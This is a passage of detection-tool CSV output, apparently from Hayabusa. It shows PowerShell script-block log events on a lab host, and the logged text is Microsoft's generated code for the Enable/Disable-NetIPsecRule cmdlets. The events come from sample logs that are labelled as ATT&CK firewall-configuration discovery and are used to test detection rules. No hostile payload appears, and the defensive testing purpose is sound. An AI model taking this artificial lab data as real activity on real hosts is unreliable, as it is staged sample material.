$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') 
-contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) 
$__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', 
$__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetConSecRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetConSecRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName 
)) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetConSecRuleFilterByInterfaceType', 'PartComponent', 'Group",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"Component', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetConSecRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetConSecRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase2AuthSet') -and (@('ByAssociatedNetIPsecPhase2AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase2AuthSet}, 'MSFT_NetConSecRuleEMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecPhase1AuthSet') -and (@('ByAssociatedNetIPsecPhase1AuthSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and 
(@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName 
)) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('Enable', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Enable-NetIPsecRule' function 
Disable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] 
[ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] 
[ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] 
[Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] 
[PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(Par",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx
+2021-10-25 16:23:05.754 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"ameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] 
[Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper 
$__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains 
$PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', 
